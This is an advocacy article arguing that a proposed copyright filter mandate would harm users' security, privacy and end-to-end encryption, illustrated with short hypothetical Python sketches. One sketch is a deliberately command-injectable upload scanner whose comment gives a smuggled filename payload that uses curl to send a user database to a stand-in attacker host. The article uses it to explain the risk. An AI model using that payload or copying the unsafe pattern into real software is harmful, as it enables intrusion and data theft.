Among its many other problems, the Strengthening Measures to Advance Rights Technologies Copyright Act would mandate a slew of filtering technologies that online service providers must "accommodate." And that mandate is so broad, so poorly conceived, and so technically misguided that it will inevitably create serious privacy and security risks.

Since 1998, the Digital Millennium Copyright Act (DMCA) has required services to accommodate "standard technical measures" to reduce infringement. The DMCA’s definition of standard technical measures (STMs) requires them to be developed by a broad consensus in an open, fair, multi-industry, and, perhaps most importantly, voluntary process. In other words, current law reflects an understanding that most technologies shouldn’t be adopted as standards because standards affect many, many stakeholders who all deserve a say.

But the filter mandate bill is clearly designed to undermine the measured provisions of the DMCA. It changes the definition of standard technical measures to also include technologies supported by only a small number of rightsholders and technology companies. 

It also adds a new category of filters called "designated technical measures" (DTMs), which must be "accommodated" by online services. "Accommodating" is broadly defined as "adapting, implementing, integrating, adjusting, and conforming" to the designated technical measure. A failure to do so could mean losing the DMCA’s safe harbors, and with them protection from crushing liability for the actions of a service’s users.

The Copyright Office would be in charge of designating those measures. Anyone can petition for such a designation, including companies that make these technologies and want to guarantee a market for them.

The sheer breadth of potential petitions would put a lot of pressure on the Copyright Office—which exists to register copyrights, not evaluate technology. It would put even more pressure on people who have internet users' rights at heart—independent creators, technologists, and civil society—to oppose the petitions and present evidence of the dangers they'd produce. Those dangers are far too likely, given the number of technologies that the new rules would require services to "accommodate."

Requiring This "Accommodation" Would Endanger Security

The filter mandate allows the Copyright Office to mandate "accommodation" for both specific technologies and general categories of technologies. That opens up a number of security issues.

There’s a reason standardization is a long, arduous process: it’s meant to surface potential problems before a technology is required across the board. Requiring unproven, unaudited technology to be universally deployed would be a disaster for security.

Consider a piece of software developed to scan uploaded content for copyrighted works. Even leaving aside questions of fair use, the bill text places no constraints on the security expertise of the developer. At large companies, third-party software is typically audited thoroughly by an in-house security team before being integrated into the software stack. A law, especially one requiring only the minimal approval of the Copyright Office, should not be able to bypass these checks, and it certainly shouldn’t impose unvetted software on companies that lack the resources to do such audits themselves. Poorly implemented software leaves security vulnerabilities that malicious hackers can exploit to exfiltrate the personal information of a service’s users.
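To make the risk concrete, here is a minimal, purely hypothetical sketch (the "matchscan" tool and the integration code are invented for illustration, not taken from any real product) of how a rushed integration can hand attackers a foothold: a user-controlled filename is passed through a shell, so a crafted name can run arbitrary commands and ship data off the server.

```python
import subprocess

def scan_upload_unsafe(filename: str) -> bool:
    # UNSAFE: the user-chosen filename is pasted into a shell command line.
    # A filename like "clip.mp4; curl -d @/srv/db/users.csv https://attacker.example"
    # would make the server run the attacker's commands and exfiltrate data.
    result = subprocess.run(f"matchscan --input uploads/{filename}", shell=True)
    return result.returncode == 0

def scan_upload_safer(filename: str) -> bool:
    # Passing arguments as a list avoids the shell, so the filename is treated
    # as data rather than as part of a command (path checks are still needed).
    result = subprocess.run(["matchscan", "--input", f"uploads/{filename}"])
    return result.returncode == 0
```

The point isn’t this particular bug; it’s that a mandate can force code like the first version onto thousands of services that have no security team to catch it.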

Security is hard enough as it is. Mistakes that lead to database breaches happen all the time, even with teams doing their best at security; who doesn’t have free credit monitoring from a breach at this point? With this bill, what incentive does a company that makes content-matching technology have to invest the time and money in building secure software? The Copyright Office isn’t going to check for buffer overflows. And what happens when a critical vulnerability is found after software has been approved and widely implemented? Companies will have to choose: turn the measure off, giving up their DMCA protections and risking being sued out of existence, or leave it running and expose their users to the vulnerability. No one wins in that scenario, and users lose the most.

"Accommodation" Would Also Hurt Privacy

Similar concerns arise over privacy. It’s bad enough that potential bugs could be exploited to divulge user data, but this bill also leaves the door wide open for direct collection of user data. That’s because a DTM could include a program that identifies potential infringement by collecting personal data while a service is being used and then sends that data directly to an external party for review. The scale of such data collection would blow the Cambridge Analytica scandal out of the water, as it would be required across all services, for all of their users. It’s easy to imagine how such functionality would be a dream for copyright enforcers—a direct way to track down and contact infringers, no action required by the service provider—and a nightmare for user privacy.
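To illustrate how direct that pipeline could be, here is a short hypothetical sketch (the endpoint and field names are invented): a server-side measure that, whenever a match fires, bundles a user’s identifying details with the flagged upload and sends them straight to an outside party.

```python
import json
from urllib import request

CLAIMS_ENDPOINT = "https://claims.example/report"  # hypothetical rightsholder service

def report_suspected_infringement(user: dict, upload: dict) -> None:
    # Nothing in this flow involves the service reviewing the match or
    # notifying the user; their personal data simply leaves the platform.
    payload = {
        "username": user["name"],
        "email": user["email"],
        "ip_address": user["last_ip"],
        "upload_title": upload["title"],
        "content_hash": upload["hash"],
    }
    req = request.Request(
        CLAIMS_ENDPOINT,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    request.urlopen(req)
```

A measure built this way turns every covered service into a data feed for whoever controls the endpoint.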

Even technology that collects information only when it detects use of copyrighted media on a service would be disastrous for privacy. The bill places no restrictions on the channels for content sharing that would fall under these provisions. Publicly viewable content is one thing, but providers could be forced to apply scanning technology to all content that crosses a platform—even if it’s only sent in a private message. Worse, this bill could be used to require platforms to scan the contents of encrypted messages between users, which would fundamentally break the promise of end-to-end encryption. If someone sends a message to a friend but the scanning software tattles on them to the service, or even directly to a media company, that’s simply not end-to-end encryption. Even in the best case, assuming the software works perfectly as intended, there’s no way to require it across all of a service’s activities and still allow end-to-end encryption: if information about the contents of a message can leak, that message can’t be considered encrypted. And in practice, such leaks would happen regularly, even for fair use content, since a human would likely have to review whatever the filter flags.
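To make that concrete, here is a minimal hypothetical sketch of a messaging client with a scanning hook bolted on (the scanner, reporting call, and encryption function are all placeholders, not any real app’s code). The filter has to run on the plaintext, and the moment it reports a match it has disclosed something about a private message to a third party.

```python
from typing import Callable

def send_message(
    plaintext: str,
    encrypt_for_recipient: Callable[[str], bytes],   # stand-in for the app's real E2EE
    looks_like_claimed_work: Callable[[str], bool],   # stand-in for the mandated filter
    report_match: Callable[[str], None],              # reports to the service or a rightsholder
) -> bytes:
    # The filter can only work on the plaintext; ciphertext is useless to it.
    if looks_like_claimed_work(plaintext):
        # This call reveals information about the message to someone other than
        # the recipient. Whatever happens next, the conversation is no longer
        # end-to-end encrypted in any meaningful sense.
        report_match(plaintext)
    return encrypt_for_recipient(plaintext)
```

The ordering is the whole problem: encrypting afterward can’t undo the disclosure that has already happened.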

The Copyright Office is supposed to "consider" the effect a technology would have on privacy and data security, but it doesn’t have to prioritize those effects over the multitude of other factors it must also "consider." Furthermore, evaluating privacy and security concerns requires a level of technological expertise that is outside the office’s current scope. If a company says that its technology is safe and there is no independent technologist to argue otherwise, the Copyright Office might just accept that representation. A company has an interest in defining "secure" and "private" in ways it can claim its product meets; a user or security expert might define those terms very differently. Companies also have little interest in disclosing exactly how their technology does what it claims, making it even harder to evaluate the security and privacy issues it might raise. Again, the burden is on outside experts to watch the Copyright Office proceedings and provide information on behalf of the millions of people who use the internet.

This bill is a disaster in the making. Ultimately, it would require any online service, under penalty of owing hundreds of thousands of dollars to major rightsholders, to endanger the privacy and security of its users. We all have a right to free expression, and we should not have to sacrifice privacy and security when we rely on a platform to exercise that right online.